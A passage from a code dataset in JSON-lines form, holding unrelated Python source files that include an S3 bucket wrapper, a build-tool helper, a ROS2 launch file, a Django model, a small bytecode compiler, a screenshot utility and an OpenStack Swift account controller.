hashlib\nimport boto3\nimport botocore\nfrom ndingest.util.util import Util\nUtilClass = Util.load()\n\n\nclass CuboidBucket:\n\n def __init__(self, project_name, region_name=settings.REGION_NAME, endpoint_url=settings.S3_ENDPOINT):\n \"\"\"Create resource for the cuboid queue\"\"\"\n \n bucket_name = CuboidBucket.getBucketName()\n self.project_name = project_name\n self.s3 = boto3.resource(\n 's3', region_name=region_name, endpoint_url=endpoint_url,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID, 
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY)\n try:\n self.bucket = self.s3.Bucket(bucket_name)\n except botocore.exceptions.ClientError as e:\n print (e)\n raise\n\n @staticmethod\n def createBucket(region_name=settings.REGION_NAME, endpoint_url=settings.S3_ENDPOINT):\n \"\"\"Create the cuboid bucket\"\"\"\n \n bucket_name = CuboidBucket.getBucketName()\n s3 = boto3.resource(\n 's3', region_name=region_name, endpoint_url=endpoint_url,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY)\n bucket = s3.Bucket(bucket_name)\n try:\n # creating the bucket\n response = bucket.create(\n ACL = 'private'\n )\n except Exception as e:\n print (e)\n raise\n\n @staticmethod\n def deleteBucket(region_name=settings.REGION_NAME, endpoint_url=settings.S3_ENDPOINT):\n \"\"\"Delete the cuboid bucket\"\"\"\n \n bucket_name = CuboidBucket.getBucketName()\n s3 = boto3.resource(\n 's3', region_name=region_name, endpoint_url=endpoint_url,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY)\n bucket = s3.Bucket(bucket_name)\n try:\n # deleting the bucket\n response = bucket.delete()\n except Exception as e:\n print (e)\n raise\n \n @staticmethod\n def getBucketName():\n \"\"\"Generate the Bucket Name\"\"\"\n return settings.S3_CUBOID_BUCKET\n \n\n def putObject(self, channel_name, resolution, morton_index, time_index, cube_data, neariso=False):\n \"\"\"Put object in the cuboid bucket.\n\n Not supported by the Boss. Use putObjectByKey() instead.\n \"\"\"\n supercuboid_key = self.generateSupercuboidKey(channel_name, resolution, morton_index, time_index, neariso=neariso)\n return self.putObjectByKey(supercuboid_key, cube_data)\n \n def putObjectByKey(self, supercuboid_key, cube_data):\n \"\"\"Put object in the cuboid bucket by key\"\"\"\n \n try:\n response = self.bucket.put_object(\n ACL = 'private',\n Body = cube_data,\n Key = supercuboid_key,\n StorageClass = 'STANDARD'\n )\n return response\n except Exception as e:\n print (e)\n raise\n \n def getObjectByKey(self, supercuboid_key):\n \"\"\"Get an object from the cuboid bucket based on key. \"\"\"\n \n try:\n s3_obj = self.s3.Object(self.bucket.name, supercuboid_key)\n response = s3_obj.get()\n return response['Body'].read()\n except Exception as e:\n # print (e)\n raise\n\n def getObject(self, channel_name, resolution, morton_index, time_index, neariso=False):\n \"\"\"Get object from the cuboid bucket based on parameters.\n\n Not supported by the Boss. 
Use getObjectByKey() instead.\n \"\"\"\n\n supercuboid_key = self.generateSupercuboidKey(channel_name, resolution, morton_index, time_index, neariso=neariso)\n return self.getObjectByKey(supercuboid_key)\n\n def generateSupercuboidKey(self, channel_name, resolution, morton_index, time_index, neariso=False):\n \"\"\"Generate the supercuboid key\"\"\"\n return UtilClass.generateCuboidKey(self.project_name, channel_name, resolution, morton_index, time_index, neariso=neariso)\n\n def deleteObject(self, supercuboid_key):\n \"\"\"Delete object from the upload bucket\"\"\"\n \n try:\n s3_obj = self.s3.Object(self.bucket.name, supercuboid_key)\n response = s3_obj.delete()\n return response\n except Exception as e:\n print (e)\n raise\n\n def getAllObjects(self):\n \"\"\"Get a collection of ObjectSummary for all objects in the bucket.\"\"\"\n\n try:\n return self.bucket.objects.all()\n except Exception as e:\n print (e)\n raise\n","repo_name":"neurodata/ndingest","sub_path":"ndbucket/cuboidbucket.py","file_name":"cuboidbucket.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"70030439658","text":"import yaml\nfrom pprint import pprint as print\nfrom os import popen, system, getcwd,path\nfrom logger import logger\n\n__CMD_BOB_QUERY_SRC_PATH__ = \"CONFIG_JNN=1 bob query-path -f {{src}} -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_QUERY_BUILD_PATH__ = \"CONFIG_JNN=1 bob query-path -f {{build}} -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_SHOW__ = \"CONFIG_JNN=1 bob show --format=yaml -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_QUERY_RECIPE__ = \"CONFIG_JNN=1 bob query-recipe -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_BUILD__ = \"CONFIG_JNN=1 bob dev -DCONFIG_JNN=1 -DCMAKE_EXPORT_COMPILE_COMMANDS=1 {module}\"\n__CMD_BOB_CLEAN_BUILD__ = \"CONFIG_JNN=1 bob dev --clean -DCONFIG_JNN=1 -DCMAKE_EXPORT_COMPILE_COMMANDS=1 {module}\"\n\n\ndef os_popen(cmd_string):\n logger.debug(\"cmd:{}\".format(cmd_string))\n return popen(cmd_string)\n\n\nclass BobPackage:\n def __init__(self, name, level, cache, **kawrgs):\n self.name = name\n self.kwargs = kawrgs\n\n self.__level = level\n self.sub_pkgs = list()\n\n self.__cache = cache\n cache_pkg = cache.get(self.name)\n self.__info = cache_pkg.get('info') if isinstance(\n cache_pkg, dict) else None\n self.__deps = cache_pkg.get('depends') if isinstance(\n cache_pkg, dict) else None\n self.__yaml = cache_pkg.get('yaml') if isinstance(\n cache_pkg, dict) else None\n self.__src = cache_pkg.get('src') if isinstance(\n cache_pkg, dict) else None\n self.__build = cache_pkg.get('build') if isinstance(\n cache_pkg, dict) else None\n\n def get_info(self):\n if self.__info is None:\n cmd_string = __CMD_BOB_SHOW__.format(module=self.name)\n self.__info = yaml.full_load(os_popen(cmd_string))\n return self.__info\n\n def get_depends(self):\n if self.__deps is None:\n self.__deps = self.get_info().get('depends')\n logger.debug(\"SubModuls: {}\".format(self.__deps))\n return self.__deps\n\n def get_yaml(self):\n\n if self.__yaml is None:\n cmd_string = __CMD_BOB_QUERY_RECIPE__.format(module=self.name)\n recpie_files_list = os_popen(cmd_string).readlines()\n for i in recpie_files_list:\n if self.__yaml is None and i.startswith('recipes'):\n self.__yaml = i.strip('\\n')\n logger.debug(self.__yaml)\n return self.__yaml\n\n def get_build_dir(self):\n \n if self.__build is None or self.__build =='':\n try:\n cmd_string = __CMD_BOB_QUERY_BUILD_PATH__.format(\n module=self.name)\n work_dir_str = 
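# --- Added usage sketch (mine) for the CuboidBucket wrapper above: a put/get
# round-trip by key. The project and channel names are placeholders and the
# bucket named by settings.S3_CUBOID_BUCKET is assumed to exist, so the calls
# are left commented out rather than presented as runnable.
# bucket = CuboidBucket("kasthuri11")
# key = bucket.generateSupercuboidKey("image", 0, morton_index=0, time_index=0)
# bucket.putObjectByKey(key, b"\x00" * 64)
# assert bucket.getObjectByKey(key) == b"\x00" * 64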
os_popen(cmd_string).readlines()\n work_dir_str = work_dir_str[0].strip('\\n')\n self.__build = work_dir_str\n except Exception as e:\n logger.error(\n \"Get build dir Failed for with error:'{}'\".format(str(e)))\n finally:\n logger.debug(\"build {}\".format(self.__build))\n return self.__build\n\n def get_src_dir(self):\n if self.__src is None:\n try:\n cmd_string = __CMD_BOB_QUERY_SRC_PATH__.format(\n module=self.name)\n work_dir_str = os_popen(cmd_string).readlines()\n work_dir_str = work_dir_str[0].strip('\\n')\n self.__src = work_dir_str\n\n except Exception as e:\n logger.error(\n \"Get src dir Failed for with error:'{}'\".format(str(e)))\n self.__src = ''\n pass\n\n logger.debug(\"src_dir {}\".format(self.__src))\n return self.__src\n\n def build_package(self,pattern=__CMD_BOB_BUILD__):\n print(self.kwargs)\n if self.kwargs.get('build_depends') == True and self.__level >= 0:\n if isinstance(self.get_build_dir(), str):\n getcwd()\n if not path.exists(path.join( getcwd(), self.get_build_dir(), 'compile_commands.json')):\n cmd_string = pattern.format(module=self.name)\n print(cmd_string)\n system(cmd_string)\n\n def dump(self):\n ret = {self.name: {'name': self.name,\n 'info': self.get_info(),\n 'depends': self.get_depends(),\n 'yaml': self.get_yaml(),\n 'src': self.get_src_dir(),\n 'build': self.get_build_dir()}}\n\n return ret\n\n def process_subpackages(self):\n if (self.__level > 0):\n print(\"package {} depends {}\".format(\n self.name, self.get_depends()))\n depends = self.get_depends()\n if depends is not None:\n for pkt_name in depends:\n sub_pkt = BobPackage(\n pkt_name, self.__level-1, self.__cache, **self.kwargs)\n sub_pkt.process()\n sub_pkt.build_package(__CMD_BOB_CLEAN_BUILD__)\n self.sub_pkgs.append(sub_pkt)\n\n def process(self):\n print(\"processing package:{}\".format(self.name))\n self.get_info()\n self.get_depends()\n self.get_yaml()\n self.get_src_dir()\n self.get_build_dir()\n self.__cache.update(**self.dump())\n self.process_subpackages()\n","repo_name":"dllvhaobo/working-in-wsl","sub_path":"tools/ClangdGen/BobPackage.py","file_name":"BobPackage.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"37359373421","text":"n, s = int(input()), input()\nk, r = 0, []\nfor i in range(1, n + 1):\n p = s[i:] + s[:i]\n for j in range(n // 2):\n if p[j] != p[-j - 1]:\n break\n else:\n k += 1\n r.append(i)\nprint(k)\nfor m in r:\n print(m)\n","repo_name":"sosnovskiim/Informatics","sub_path":"olimp_27_10_22/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18336758739","text":"import math\nA, B = map(int, input().split())\n\ndef gcd(A, B):\n if A < B:\n A, B = B, A\n while B > 0:\n temp = A % B\n A = B\n B = temp\n return A\n\ngcd_num = gcd(A, B)\n\ndef prime(a):\n max_a = 1 + int(math.sqrt(a))\n d = dict()\n d[1] = 1\n i = 2\n while a != 1:\n if i > max_a:\n d[a] = 1\n break\n if a % i == 0:\n a = a // i\n if i in d:\n d[i] += 1\n else:\n d[i] = 1\n else:\n i += 1\n return d\nd = prime(gcd_num) \n\nprint(len(d))","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02900/s634406192.py","file_name":"s634406192.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"10240259469","text":"import os\nfrom ament_index_python.packages import 
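# --- Added aside (mine) on the gcd/prime-count solution above: the dict it
# builds maps each prime factor of gcd(A, B) to its exponent, plus a sentinel
# key 1, so len(d) is 1 + the number of distinct common prime factors.
# A small cross-check with plain trial division:
import math

def distinct_prime_count(n: int) -> int:
    count, p = 0, 2
    while p * p <= n:
        if n % p == 0:
            count += 1
            while n % p == 0:
                n //= p
        p += 1
    return count + (1 if n > 1 else 0)

# gcd(12, 18) = 6 = 2 * 3 -> two distinct primes -> the program prints 3
assert distinct_prime_count(math.gcd(12, 18)) + 1 == 3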
get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription, GroupAction\nfrom launch.substitutions import LaunchConfiguration\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import ThisLaunchFileDir\nfrom launch_ros.actions import Node\nfrom launch_ros.actions import PushRosNamespace\n\ndef generate_launch_description():\n\n    aimbot_pkg = 'aimbot_pkg'\n    td_node_name = 'target_detection_node'\n    target_detection_launch = 'target_detection.launch.py'\n\n    nav_package = 'ucsd_robocar_nav2_pkg'\n    all_components_launch = 'all_components.launch.py'\n\n    ld = LaunchDescription()\n\n    components_launch = IncludeLaunchDescription(\n        PythonLaunchDescriptionSource(\n            os.path.join(\n                get_package_share_directory(nav_package),\n                'launch',\n                all_components_launch)\n        )\n    )\n\n    # target_detection_node = Node(\n    #     package=aimbot_pkg,\n    #     executable=td_node_name,\n    #     output='screen',\n    # )\n\n    # distinct name so the include does not shadow the filename string above\n    target_detection_include = IncludeLaunchDescription(\n        PythonLaunchDescriptionSource(\n            os.path.join(\n                get_package_share_directory(aimbot_pkg),\n                'launch',\n                target_detection_launch)\n        )\n    )\n\n\n    ld.add_action(components_launch)\n    ld.add_action(target_detection_include)\n\n    return ld\n\n\n\n","repo_name":"aksharans/ucsd148team6","sub_path":"launch/target_detection.launch.py","file_name":"target_detection.launch.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"18185155719","text":"from functools import reduce\n\nN, K = map(int, input().split())\nA = list(map(int, input().split()))\nAp = [a for a in A if a>0]\nAm = [a for a in A if a<0]\nmod = 10**9+7\nif len(Ap) + len(Am) < K:\n    print(0)\n    exit()\nif len(Ap) + len(Am) == K:\n    if 0 in A and len(Am) % 2:\n        print(0)\n    else:\n        ans = reduce(lambda a, b: a * b % mod, Ap+Am, 1)\n        print(ans)\n    exit()\nAp.sort(reverse=True)\nAm.sort()\nif len(Ap) == 0:\n    if K%2:\n        if 0 in A:\n            ans = 0\n        else:\n            ans = reduce(lambda a, b: a*b%mod, Am[-K:], 1)\n    else:\n        ans = reduce(lambda a, b: a*b%mod, Am[:K], 1)\n    print(ans)\n    exit()\n\nidx_Am = 0\nn = 0\nans = 1\nfor idx_Ap, ap in enumerate(Ap+[0]):\n    while idx_Am < len(Am) and n < K and -Am[idx_Am] > ap:\n        ans = ans * Am[idx_Am] % mod\n        idx_Am += 1\n        n += 1\n    if n == K:\n        break\n    n += 1\n    idx_Ap += 1\n    ans = ans * ap % mod\n    if n == K:\n        break\nelse:\n    assert False\nif idx_Am % 2 == 0:\n    print(ans)\nelse:\n    if idx_Ap == len(Ap) or (idx_Am != len(Am) and idx_Ap > 0 and Am[idx_Am] * Am[idx_Am-1] > Ap[idx_Ap] * Ap[idx_Ap-1]):\n        ans = ans * Am[idx_Am] * pow(Ap[idx_Ap-1], mod-2, mod) % mod\n    else:\n        ans = ans * Ap[idx_Ap] * pow(Am[idx_Am-1], mod-2, mod) % mod\n    print(ans)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02616/s877070483.py","file_name":"s877070483.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"70881392936","text":"from docx.enum.text import WD_ALIGN_PARAGRAPH\n\n\ndef prepare_form(document, vip_name_title, pax, country, flight, date, time):\n    vip_country_table = document.tables[0]\n    row = vip_country_table.rows[1]\n    vip_name_title_cell = row.cells[0]\n    country_cell = row.cells[2]\n\n    flight_info_table = document.tables[1]\n    row = flight_info_table.rows[1]\n    date_cell = row.cells[2]\n    time_cell = row.cells[4]\n    flight_cell = row.cells[6]\n\n    if pax != \"0\":\n        vip_name_title_cell.text = vip_name_title + \" + \" + pax + \" Pax.\"\n    else:\n        
vip_name_title_cell.text = vip_name_title\n\n    country_cell.text = country\n    country_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n    date_cell.text = date\n    date_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n    time_cell.text = time\n    time_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n    flight_cell.text = flight\n    flight_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n\ndef add_drivers(document, limo_df):\n    limo_table = document.tables[3]\n\n    if len(limo_df) > 15:\n        print(\"There are more than 15 limousines in the list, which is not allowed at GVA.\nPlease check the list and try again.\")\n        exit()\n\n    for i in range(0, len(limo_df)):\n        row = limo_table.rows[i+1]\n        limo_cell = row.cells[0]\n        driver_cell = row.cells[1]\n        limo_cell.text = limo_df.iloc[i, 0]\n        driver_cell.text = limo_df.iloc[i, 1]\n\n    \n","repo_name":"Dany-Drgh/wordFormFiller","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"262065005","text":"import logging\nimport pathlib\nimport uuid\nimport tempfile\nfrom PIL import Image\n\nfrom app.core.config import settings\nfrom app.core.emails import EmailSender\nfrom app.data_access.models import Place\nfrom app.data_access.unit_of_work import UnitOfWork\n\n\nclass ImageStorage:\n    def __init__(self, unit_of_work: UnitOfWork, email_sender: EmailSender) -> None:\n        self.__uow = unit_of_work\n        self.__email_sender = email_sender\n        self.__logger = logging.getLogger(self.__class__.__name__)\n\n    def store_place_image(self, place: Place, content: bytes) -> None:\n        try:\n            with tempfile.TemporaryFile() as file:\n                file.write(content)\n                file.seek(0)  # rewind so Image.open reads from the start\n                image = Image.open(file)\n\n        except IOError:\n            self.__logger.error(\"Invalid image\")\n            self.__email_sender.notify_invalid_image(place)\n\n        else:\n            self.__store_image(place, content, image.format if image.format else \"jpg\")\n\n    def __store_image(self, place: Place, content: bytes, image_format: str) -> None:\n        output_filename = f\"place_image_{place.id}_{uuid.uuid4()}.{image_format}\"\n        output_path = (\n            pathlib.Path(settings.STATICFILES_DIR)\n            .joinpath(\"uploads\")\n            .joinpath(output_filename)\n        )\n        output_path.write_bytes(content)\n        place.image = f\"{settings.STATIC_URL}/uploads/{output_filename}\"\n        self.__uow.commit()\n        self.__uow.index(place)\n","repo_name":"xlurio/gee","sub_path":"app/storage/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
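# --- Added aside (mine, not part of the gee record above): the same validity
# check can avoid the temporary file entirely by letting Pillow read from
# memory; sniff_format is a hypothetical helper, not part of the project.
import io
from PIL import Image

def sniff_format(content: bytes):
    try:
        with Image.open(io.BytesIO(content)) as im:
            return im.format or "JPEG"
    except IOError:
        return None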
+{"seq_id":"71695411177","text":"import os\nimport sys\n\n\nargs = sys.argv\n\ndef wb(byte):\n    try:\n        f = open(\"out.chexc\", \"ab\")\n        f.write(byte)\n        f.close()\n    except:\n        print(\"something went wrong during the writing process\")\n        sys.exit(1)\ndef ewerr(err, errcode, line):\n    print(\"CHex compile error on line \" + str(line) + \":\" + err)\n    sys.exit(errcode)\ndef create_file(filename):\n    f = open(filename, \"w\")\n    f.close()\n    \ntry:\n    filler = args[1]\nexcept:\n    print(\"No args given\")\n    sys.exit(1)\n\ntry:\n    f = open(args[1], \"r\")\n    lines = f.readlines()\n    f.close()\nexcept:\n    ewerr(\"Missing file\", 2, 0)\nlinenum = 0\ncreate_file(\"out.chexc\")\nwb(b'hi')\nfor line in lines:\n    linenum += 1\n    split = line.split()\n    # comments\n    if line == \"\" or line.startswith(\";\"):\n        pass\n    # print\n    elif line.startswith(\"pr \"):\n        if not len(split) == 2:\n            ewerr(\"Wrong args\", 5, linenum)\n        try:\n            hext = b'\x01' + bytes([int(split[1])])\n        except:\n            ewerr(\"Can't convert decimal to hex\", 4, linenum)\n        wb(hext)\n    # jump\n    elif line.startswith(\"jmp \"):\n        if not len(split) == 2:\n            ewerr(\"Wrong args\", 5, linenum)\n        try:\n            hext = b'\x02' + bytes([int(split[1])])\n        except:\n            ewerr(\"Can't convert decimal to hex\", 4, linenum)\n        wb(hext)\n    # store\n    elif line.startswith(\"str \"):\n        if not len(split) == 3:\n            ewerr(\"Wrong args\", 5, linenum)\n        try:\n            hext = b'\x03' + bytes([int(split[1])]) + bytes([int(split[2])])\n        except:\n            ewerr(\"Can't convert decimal to hex\", 4, linenum)\n        wb(hext)\n    # jump to place in stored memory\n    elif line.startswith(\"jmpmem \"):\n        if not len(split) == 2:\n            ewerr(\"Wrong args\", 5, linenum)\n        try:\n            hext = b'\x04' + bytes([int(split[1])])\n        except:\n            ewerr(\"Can't convert decimal to hex\", 4, linenum)\n        wb(hext)\n    # jump if equal\n    elif line.startswith(\"jmpeq \"):\n        if not len(split) == 4:\n            ewerr(\"Wrong args\", 5, linenum)\n        try:\n            hext = b'\x05' + bytes([int(split[1])]) + bytes([int(split[2])]) + bytes([int(split[3])])\n        except:\n            ewerr(\"Can't convert decimal to hex\", 4, linenum)\n        wb(hext)\n    else:\n        ewerr(\"Unknown command\", 10, linenum)\n    \n    \n","repo_name":"Ccode-archives/CHex","sub_path":"chexcomp.py","file_name":"chexcomp.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"}
+{"seq_id":"73062855976","text":"from django.db import models\n\n\nclass Player(models.Model):\n    sofifa_id = models.IntegerField(\n        db_column='nb_sofifa_id',\n        null=False,\n        verbose_name='Sofifa id'\n    )\n    player_url = models.CharField(\n        db_column='tx_player_url',\n        verbose_name='Player url',\n        max_length=128,\n        null=False\n    )\n    short_name = models.CharField(\n        db_column='tx_short_name',\n        verbose_name='Short name',\n        max_length=64,\n        null=False\n    )\n    long_name = models.CharField(\n        db_column='tx_long_name',\n        verbose_name='Long name',\n        max_length=64,\n        null=False\n    )\n    age = models.IntegerField(\n        db_column='nb_agr',\n        null=False,\n        verbose_name='Age'\n    )\n    nationality = models.CharField(\n        db_column='tx_nationality',\n        verbose_name='Nationality',\n        max_length=64,\n        null=False\n    )\n    club_name = models.CharField(\n        db_column='tx_club_name',\n        verbose_name='Club name',\n        max_length=64,\n        null=False\n    )\n    league_name = models.CharField(\n        db_column='tx_league_name',\n        verbose_name='League name',\n        max_length=64,\n        null=False\n    )\n    overall = models.IntegerField(\n        db_column='nb_overall',\n        null=False,\n        verbose_name='Overall'\n    )\n    potential = models.IntegerField(\n        db_column='nb_potential',\n        null=False,\n        verbose_name='Potential'\n    )\n\n    class Meta:\n        managed = True\n        db_table = 'player'\n        verbose_name = 'Player'\n        verbose_name_plural = 'Players'\n","repo_name":"limahgustavo/sofifa-core","sub_path":"api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"18058550869","text":"def game():\n\ts1 = input()\n\ts2 = input()\n\ts3 = input()\n\tx = s1[0]\n\twhile len(s1)>=0 and len(s2)>=0 and len(s3)>=0:\n\t\tif x=='a':\n\t\t\tif len(s1)==0:\n\t\t\t\tprint(\"A\")\n\t\t\t\treturn\n\t\t\tx = s1[0]\n\t\t\ts1 = s1[1:]\n\t\tif x=='b':\n\t\t\tif len(s2)==0:\n\t\t\t\tprint(\"B\")\n\t\t\t\treturn\n\t\t\tx = s2[0]\n\t\t\ts2 = s2[1:]\n\t\tif x=='c':\n\t\t\tif len(s3)==0:\n\t\t\t\tprint(\"C\")\n\t\t\t\treturn\n\t\t\tx = s3[0]\n\t\t\ts3 = 
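# --- Added sketch (mine) of a decoder matching the bytecode the CHex compiler
# above emits, inferred from its opcode table; the real CHex VM may differ.
# Files start with the two-byte header b'hi', then records of one opcode byte
# plus a fixed number of argument bytes.
OPS = {0x01: ("pr", 1), 0x02: ("jmp", 1), 0x03: ("str", 2),
       0x04: ("jmpmem", 1), 0x05: ("jmpeq", 3)}

def disassemble(path: str = "out.chexc") -> None:
    with open(path, "rb") as f:
        data = f.read()
    assert data[:2] == b"hi", "missing CHex header"
    i = 2
    while i < len(data):
        name, argc = OPS[data[i]]
        print(name, *data[i + 1:i + 1 + argc])
        i += 1 + argc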
s3[1:]\n\t\t\ngame()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03998/s100832975.py","file_name":"s100832975.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"16918491128","text":"import argparse\r\nfrom playwright.sync_api import sync_playwright\r\nimport time\r\nimport secrets\r\n\r\n\r\ndef screenshot(website: str, headless: bool = True, delay: int = 0, full: bool = False):\r\n with sync_playwright() as playwright:\r\n browser = playwright.chromium.launch(headless=headless)\r\n page = browser.new_page()\r\n page.goto(website)\r\n time.sleep(delay)\r\n page.screenshot(\r\n full_page=full,\r\n timeout=15 * 1000,\r\n type=\"png\",\r\n path=f\"screenshots/{secrets.token_urlsafe(8)}.png\",\r\n )\r\n print(\"Screenshot saved.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\r\n \"--website\", \"-w\", required=True, help=\"The website to take a screenshot of\"\r\n )\r\n parser.add_argument(\r\n \"--delay\",\r\n \"-d\",\r\n required=False,\r\n help=\"How long to wait before taking the screenshot (seconds)\",\r\n type=int,\r\n default=0,\r\n )\r\n parser.add_argument(\r\n \"--headless\",\r\n required=False,\r\n help=\"If the process should be headless or not\",\r\n default=True,\r\n type=bool,\r\n )\r\n parser.add_argument(\r\n \"--full_page\",\r\n \"-fp\",\r\n required=False,\r\n help=\"If the screenshot should be of the full page\",\r\n default=False,\r\n type=bool,\r\n )\r\n ParsedArgs = parser.parse_args()\r\n screenshot(\r\n website=ParsedArgs.website,\r\n headless=ParsedArgs.headless,\r\n delay=ParsedArgs.delay,\r\n full=ParsedArgs.full_page,\r\n )\r\n","repo_name":"curiositIy/screenshot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19516100388","text":"from urllib import unquote\n\nfrom swift.account.utils import account_listing_response, \\\n account_listing_content_type\nfrom swift.common.utils import public\nfrom swift.common.constraints import check_metadata, MAX_ACCOUNT_NAME_LENGTH\nfrom swift.common.http import HTTP_NOT_FOUND\nfrom swift.proxy.controllers.base import Controller, clear_info_cache\nfrom swift.common.swob import HTTPBadRequest, HTTPMethodNotAllowed\n\n\nclass AccountController(Controller):\n \"\"\"WSGI controller for account requests\"\"\"\n server_type = 'Account'\n\n def __init__(self, app, account_name, **kwargs):\n Controller.__init__(self, app)\n self.account_name = unquote(account_name)\n if not self.app.allow_account_management:\n self.allowed_methods.remove('PUT')\n self.allowed_methods.remove('DELETE')\n\n def GETorHEAD(self, req):\n \"\"\"Handler for HTTP GET/HEAD requests.\"\"\"\n if len(self.account_name) > MAX_ACCOUNT_NAME_LENGTH:\n resp = HTTPBadRequest(request=req)\n resp.body = 'Account name length of %d longer than %d' % \\\n (len(self.account_name), MAX_ACCOUNT_NAME_LENGTH)\n return resp\n\n partition, nodes = self.app.account_ring.get_nodes(self.account_name)\n resp = self.GETorHEAD_base(\n req, _('Account'), self.app.account_ring, partition,\n req.path_info.rstrip('/'))\n if resp.status_int == HTTP_NOT_FOUND and self.app.account_autocreate:\n content_type, error = account_listing_content_type(req)\n if error:\n return error\n return account_listing_response(self.account_name, req,\n content_type)\n return resp\n\n 
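# --- Added note (mine) on the screenshot CLI above: argparse's type=bool
# treats every non-empty string as truthy, so --headless False still parses
# as True. The usual fix is a store_true flag, sketched here with
# hypothetical flag names:
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--headful", action="store_true",
                    help="run with a visible browser window")
parser.add_argument("--full-page", action="store_true",
                    help="capture the full scrollable page")
args = parser.parse_args(["--full-page"])
assert args.full_page and not args.headful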
@public\n def PUT(self, req):\n \"\"\"HTTP PUT request handler.\"\"\"\n if not self.app.allow_account_management:\n return HTTPMethodNotAllowed(\n request=req,\n headers={'Allow': ', '.join(self.allowed_methods)})\n error_response = check_metadata(req, 'account')\n if error_response:\n return error_response\n if len(self.account_name) > MAX_ACCOUNT_NAME_LENGTH:\n resp = HTTPBadRequest(request=req)\n resp.body = 'Account name length of %d longer than %d' % \\\n (len(self.account_name), MAX_ACCOUNT_NAME_LENGTH)\n return resp\n account_partition, accounts = \\\n self.app.account_ring.get_nodes(self.account_name)\n headers = self.generate_request_headers(req, transfer=True)\n clear_info_cache(self.app, req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'PUT',\n req.path_info, [headers] * len(accounts))\n return resp\n\n @public\n def POST(self, req):\n \"\"\"HTTP POST request handler.\"\"\"\n if len(self.account_name) > MAX_ACCOUNT_NAME_LENGTH:\n resp = HTTPBadRequest(request=req)\n resp.body = 'Account name length of %d longer than %d' % \\\n (len(self.account_name), MAX_ACCOUNT_NAME_LENGTH)\n return resp\n error_response = check_metadata(req, 'account')\n if error_response:\n return error_response\n account_partition, accounts = \\\n self.app.account_ring.get_nodes(self.account_name)\n headers = self.generate_request_headers(req, transfer=True)\n clear_info_cache(self.app, req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'POST',\n req.path_info, [headers] * len(accounts))\n if resp.status_int == HTTP_NOT_FOUND and self.app.account_autocreate:\n self.autocreate_account(req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'POST',\n req.path_info, [headers] * len(accounts))\n return resp\n\n @public\n def DELETE(self, req):\n \"\"\"HTTP DELETE request handler.\"\"\"\n # Extra safety in case someone typos a query string for an\n # account-level DELETE request that was really meant to be caught by\n # some middleware.\n if req.query_string:\n return HTTPBadRequest(request=req)\n if not self.app.allow_account_management:\n return HTTPMethodNotAllowed(\n request=req,\n headers={'Allow': ', '.join(self.allowed_methods)})\n account_partition, accounts = \\\n self.app.account_ring.get_nodes(self.account_name)\n headers = self.generate_request_headers(req)\n clear_info_cache(self.app, req.environ, self.account_name)\n resp = self.make_requests(\n req, self.app.account_ring, account_partition, 'DELETE',\n req.path_info, [headers] * len(accounts))\n return resp\n","repo_name":"zaitcev/swift-lfs","sub_path":"swift/proxy/controllers/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"9196461460","text":"import sys\nimport 